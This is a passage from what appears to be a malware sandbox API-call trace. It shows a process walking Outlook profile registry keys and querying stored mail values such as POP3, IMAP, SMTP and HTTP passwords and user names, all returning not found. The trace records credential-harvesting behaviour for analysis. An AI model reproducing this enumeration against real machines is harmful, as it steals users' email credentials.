lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.165] RegCloseKey (hKey=0x95c) returned 0x0 [0249.165] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.165] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.165] RegCloseKey (hKey=0x95c) returned 0x0 [0249.165] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.165] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.165] RegCloseKey (hKey=0x95c) returned 0x0 [0249.165] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.166] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.166] RegCloseKey (hKey=0x95c) returned 0x0 [0249.166] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.166] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.166] RegCloseKey (hKey=0x95c) returned 0x0 [0249.166] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.166] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.166] RegCloseKey (hKey=0x95c) returned 0x0 [0249.166] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.166] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.166] RegCloseKey (hKey=0x95c) returned 0x0 [0249.166] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.166] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.166] RegCloseKey (hKey=0x95c) returned 0x0 [0249.166] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.166] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.166] RegCloseKey (hKey=0x95c) returned 0x0 [0249.166] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.166] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.166] RegCloseKey (hKey=0x95c) returned 0x0 [0249.166] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.166] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.166] RegCloseKey (hKey=0x95c) returned 0x0 [0249.166] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.167] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.167] RegCloseKey (hKey=0x95c) returned 0x0 [0249.167] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.167] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.167] RegCloseKey (hKey=0x95c) returned 0x0 [0249.167] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.167] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.167] RegCloseKey (hKey=0x95c) returned 0x0 [0249.167] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.167] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.167] RegCloseKey (hKey=0x95c) returned 0x0 [0249.167] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.167] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.167] RegCloseKey (hKey=0x95c) returned 0x0 [0249.167] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.167] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.167] RegCloseKey (hKey=0x95c) returned 0x0 [0249.167] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.167] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.167] RegCloseKey (hKey=0x95c) returned 0x0 [0249.167] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.167] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.167] RegCloseKey (hKey=0x95c) returned 0x0 [0249.167] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.167] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.168] RegCloseKey (hKey=0x95c) returned 0x0 [0249.168] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.168] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.168] RegCloseKey (hKey=0x95c) returned 0x0 [0249.168] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.168] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.168] RegCloseKey (hKey=0x95c) returned 0x0 [0249.168] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.168] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.168] RegCloseKey (hKey=0x95c) returned 0x0 [0249.168] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.168] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.168] RegCloseKey (hKey=0x95c) returned 0x0 [0249.168] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.168] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.168] RegCloseKey (hKey=0x95c) returned 0x0 [0249.168] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.168] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.168] RegCloseKey (hKey=0x95c) returned 0x0 [0249.168] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.168] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.168] RegCloseKey (hKey=0x95c) returned 0x0 [0249.168] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.169] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.169] RegCloseKey (hKey=0x95c) returned 0x0 [0249.169] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.169] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.169] RegCloseKey (hKey=0x95c) returned 0x0 [0249.169] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.169] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.169] RegCloseKey (hKey=0x95c) returned 0x0 [0249.169] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.169] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.169] RegCloseKey (hKey=0x95c) returned 0x0 [0249.169] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.169] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.169] RegCloseKey (hKey=0x95c) returned 0x0 [0249.169] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.169] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.169] RegCloseKey (hKey=0x95c) returned 0x0 [0249.169] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.169] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.169] RegCloseKey (hKey=0x95c) returned 0x0 [0249.169] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.169] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.169] RegCloseKey (hKey=0x95c) returned 0x0 [0249.169] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.169] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.169] RegCloseKey (hKey=0x95c) returned 0x0 [0249.170] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.170] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.170] RegCloseKey (hKey=0x95c) returned 0x0 [0249.170] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.170] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.170] RegCloseKey (hKey=0x95c) returned 0x0 [0249.170] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.170] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.170] RegCloseKey (hKey=0x95c) returned 0x0 [0249.170] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.170] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.170] RegCloseKey (hKey=0x95c) returned 0x0 [0249.170] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.170] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.170] RegCloseKey (hKey=0x95c) returned 0x0 [0249.170] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.170] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.170] RegCloseKey (hKey=0x95c) returned 0x0 [0249.170] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.170] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.170] RegCloseKey (hKey=0x95c) returned 0x0 [0249.170] LocalFree (hMem=0x5d67060) returned 0x0 [0249.170] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0x3, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="13dbb0c8aa05101a9bb000aa002fc45a", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.170] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.170] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d68100 [0249.170] wsprintfA (in: param_1=0x5d68100, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a") returned 88 [0249.171] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.171] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.171] RegCloseKey (hKey=0x95c) returned 0x0 [0249.171] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.171] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.171] RegCloseKey (hKey=0x95c) returned 0x0 [0249.171] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.171] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: 